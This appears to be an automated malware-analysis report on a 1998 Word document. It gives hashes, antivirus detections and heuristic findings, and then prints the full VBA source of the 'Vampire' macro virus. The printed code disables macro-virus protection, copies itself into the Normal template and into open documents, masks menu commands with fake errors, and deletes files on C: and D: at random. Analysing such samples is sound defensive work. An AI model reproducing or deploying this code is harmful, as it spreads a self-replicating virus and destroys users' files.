Office (OLE) malware analysis — malicious · f327708031e0aaef

MALICIOUS

Office (OLE)

42.5 KB Created: 1998-03-16 03:04:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: b3d0527632648f9f0133c72b78209f8c SHA-1: 8f1fbd2b6349fa76e401c934f39b053d97322752 SHA-256: f327708031e0aaef34e412c86fec5d74916c9ff881ea42dc7622fb5274d622c5

256 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample contains legacy WordBasic macro markers and VBA macros, including AutoOpen and AutoClose functions, suggesting an attempt to execute malicious code upon document interaction. ClamAV detections for 'Doc.Trojan.Beauty-1' and 'Doc.Trojan.Vampire-7' further confirm its malicious nature. The VBA script attempts to copy itself to the Normal template and the active document, potentially for persistence or to spread.

Heuristics 6

ClamAV: Doc.Trojan.Beauty-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Beauty-1
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
    Options.VirusProtection = False
```
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub autoopen()
```
Auto_Close macro low OLE_VBA_AUTOCLOSE

Auto_Close macro
Matched line in script
```
Sub autoclose()
```
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7860 bytes
SHA-256: `285e57a3c4d6e996939b7112aef48a239c02a65c9207403bbee3cae9c2c3889c`
Detection ClamAV: Doc.Trojan.Vampire-7 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Vampire" Sub autoclose() Attribute autoclose.VB_Description = "巨集建立於 98/03/15，建立者 AAAA" Attribute autoclose.VB_ProcData.VB_Invoke_Func = "Normal.Vampire.autoclose" Dim CV On Error Resume Next Options.VirusProtection = False Set ActiveDoc = ActiveDocument Set GlobalDoc = NormalTemplate DocumentInstalled = False GlobalInstalled = False For i = 1 To ActiveDocument.VBProject.VBComponents.Count If ActiveDocument.VBProject.VBComponents(i).Name = "Vampire" Then DocumentInstalled = True End If Next For j = 1 To NormalTemplate.VBProject.VBComponents.Count If NormalTemplate.VBProject.VBComponents(j).Name = "Vampire" Then GlobalInstalled = True End If Next If DocumentInstalled = False Then Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Vampire", Object:=wdOrganizerObjectProjectItems ActiveDoc.SaveAs , FileFormat:=wdFormatTemplate Options.SavePropertiesPrompt = False End If If GlobalInstalled = False Then Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Vampire", Object:=wdOrganizerObjectProjectItems Options.SaveNormalPrompt = False End If CV = WordBasic.Int(Rnd() * 20) + 1 If CV = 13 Then WordBasic.call "KI" WordBasic.call "KI2" End If exit_: End Sub Sub autoexec() Dim CT On Error Resume Next CT = WordBasic.Int(Rnd() * 30) + 1 If CT = 11 Or CT = 15 Or CT = 21 Or CT = 25 Or CT = 31 Then WordBasic.call "KI1" WordBasic.call "KI3" WordBasic.call "Vampire" End If End Sub Sub autoopen() On Error Resume Next Options.VirusProtection = False Set ActiveDoc = ActiveDocument Set GlobalDoc = NormalTemplate DocumentInstalled = False GlobalInstalled = False For i = 1 To ActiveDocument.VBProject.VBComponents.Count If ActiveDocument.VBProject.VBComponents(i).Name = "Vampire" Then DocumentInstalled = True End If Next For j = 1 To NormalTemplate.VBProject.VBComponents.Count If NormalTemplate.VBProject.VBComponents(j).Name = "Vampire" Then GlobalInstalled = True End If Next If DocumentInstalled = False Then Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Vampire", Object:=wdOrganizerObjectProjectItems ActiveDoc.SaveAs , FileFormat:=wdFormatTemplate Options.SavePropertiesPrompt = False End If If GlobalInstalled = False Then Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Vampire", Object:=wdOrganizerObjectProjectItems Options.SaveNormalPrompt = False End If exit_: End Sub Sub Vampire() Dim push1 Dim Ka$ Dim Kb$ Dim Kb_ On Error Resume Next INSF WordBasic.BeginDialog 180, 78, " ** Bingo *" WordBasic.Text 9, 9, 160, 13, " Word97 Macro Virus", "Text1" WordBasic.Text 27, 28, 122, 13, " ----Vampire----", "Text2" WordBasic.PushButton 43, 48, 88, 21, "OK", "push1" WordBasic.EndDialog Dim Vampire As Object: Set Vampire = WordBasic.CurValues.UserDialog push1 = WordBasic.Dialog.UserDialog(Vampire, -1, 10000) Ka$ = WordBasic.[Left$](WordBasic.[CTime$](7), 2) Kb$ = WordBasic.[Right$](WordBasic.[CTime$](7), 2) Kb_ = WordBasic.Val(Kb$) Kb_ = Kb_ + 1 Kb$ = Str(Kb_) WordBasic.OnTime Ka$ + ":" + Kb$, "Vampire97" exit_: End Sub Private Sub INSF() Dim R Dim a$ Dim B$ Dim C$ Dim D$ WordBasic.DisableInput 1 On Error Resume Next R = 0 start: a$ = "Word97 Macro Virus" B$ = "Vampire" C$ = "Vampire" D$ = "Vampire" WordBasic.Bold 1: WordBasic.Italic 1: WordBasic.Underline 1 WordBasic.Insert a$ + Chr(9) WordBasic.Bold 0: WordBasic.Italic 0: WordBasic.Underline 0 WordBasic.Insert B$ + Chr(9) WordBasic.Bold 1: WordBasic.Italic 1: WordBasic.Underline 1 WordBasic.Insert C$ + Chr(9) WordBasic.Bold 0: WordBasic.Italic 0: WordBasic.Underline 0 WordBasic.Insert D$ WordBasic.InsertPara R = R + 1 If R > 3 Then GoTo exit_ GoTo start exit_: End Sub Sub FileTemplates() Dim W WordBasic.DisableInput 1 On Error Resume Next W = WordBasic.Int(Rnd() 7) + 1 If WordBasic.Day(WordBasic.Now()) = WordBasic.Int(Rnd() * 30) + 1 Or WordBasic.WeekDay(WordBasic.Now()) = W Then WordBasic.call "KI1" End If WordBasic.Beep WordBasic.MsgBox " Out of Memory", "Microsoft Visual Basic", 48 exit_: End Sub Sub ViewVBcode() Dim W WordBasic.DisableInput 1 On Error Resume Next W = WordBasic.Int(Rnd() * 7) + 1 If WordBasic.Day(WordBasic.Now()) = WordBasic.Int(Rnd() * 30) + 1 Or WordBasic.WeekDay(WordBasic.Now()) = W Then WordBasic.call "KI1" End If WordBasic.Beep WordBasic.MsgBox " Out of Memory", "Microsoft Visual Basic", 48 exit_: End Sub Sub ToolsMacro() Dim W WordBasic.DisableInput 1 On Error Resume Next W = WordBasic.Int(Rnd() * 7) + 1 If WordBasic.Day(WordBasic.Now()) = WordBasic.Int(Rnd() * 30) + 1 Or WordBasic.WeekDay(WordBasic.Now()) = W Then WordBasic.call "KI1" End If WordBasic.Beep WordBasic.MsgBox " Out of Memory", "Microsoft Visual Basic", 48 exit_: End Sub Sub ToolsCustomize() Dim W WordBasic.DisableInput 1 On Error Resume Next W = WordBasic.Int(Rnd() * 7) + 1 If WordBasic.Day(WordBasic.Now()) = WordBasic.Int(Rnd() * 30) + 1 Or WordBasic.WeekDay(WordBasic.Now()) = W Then WordBasic.call "KI1" End If WordBasic.Beep WordBasic.MsgBox " Out of Memory", "Microsoft Visual Basic", 48 exit_: End Sub Sub ToolsOptions() Dim W WordBasic.DisableInput 1 On Error Resume Next W = WordBasic.Int(Rnd() * 7) + 1 If WordBasic.Day(WordBasic.Now()) = WordBasic.Int(Rnd() * 30) + 1 Or WordBasic.WeekDay(WordBasic.Now()) = W Then WordBasic.call "KI1" End If WordBasic.Beep WordBasic.MsgBox " Out of Memory", "Microsoft Visual Basic", 48 exit_: End Sub Sub KI() Dim WC Dim i Dim k$ Dim KF$ pcscan: On Error Resume Next WC = WordBasic.CountDirectories("C:\") For i = 1 To WC k$ = "C:\" + WordBasic.[GetDirectory$]("C:\", i) + "\." KF$ = WordBasic.[Files$]("C:\" + WordBasic.[GetDirectory$]("C:\", i) + "\.") If KF$ = "" Then GoTo TWO WordBasic.Kill KF$ TWO: Next i exit_: End Sub Sub KI1() Dim R Dim WC1 Dim i Dim k$ Dim KF$ R = 0 pcscana: On Error Resume Next WC1 = WordBasic.CountDirectories("C:\") For i = 1 To WC1 k$ = "C:\" + WordBasic.[GetDirectory$]("C:\", i) + "\." KF$ = WordBasic.[Files$]("C:\" + WordBasic.[GetDirectory$]("C:\", i) + "\.") If KF$ = "" Then GoTo TWO WordBasic.Kill KF$ TWO: Next i exit_: R = R + 1 If R <= 7 Then GoTo pcscana End Sub Sub KI2() Dim WC2 Dim i Dim k$ Dim KF$ pcscanb: On Error Resume Next WC2 = WordBasic.CountDirectories("D:\") For i = 1 To WC2 k$ = "D:\" + WordBasic.[GetDirectory$]("D:\", i) + "\." KF$ = WordBasic.[Files$]("C:\" + WordBasic.[GetDirectory$]("D:\", i) + "\.") If KF$ = "" Then GoTo TWO WordBasic.Kill KF$ TWO: Next i exit_: End Sub Sub KI3() Dim R Dim WC3 Dim i Dim k$ Dim KF$ R = 0 pcscanc: On Error Resume Next WC3 = WordBasic.CountDirectories("D:\") For i = 1 To WC3 k$ = "D:\" + WordBasic.[GetDirectory$]("D:\", i) + "\." KF$ = WordBasic.[Files$]("D:\" + WordBasic.[GetDirectory$]("D:\", i) + "\.") If KF$ = "" Then GoTo TWO WordBasic.Kill KF$ TWO: Next i exit_: R = R + 1 If R <= 7 Then GoTo pcscanc End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.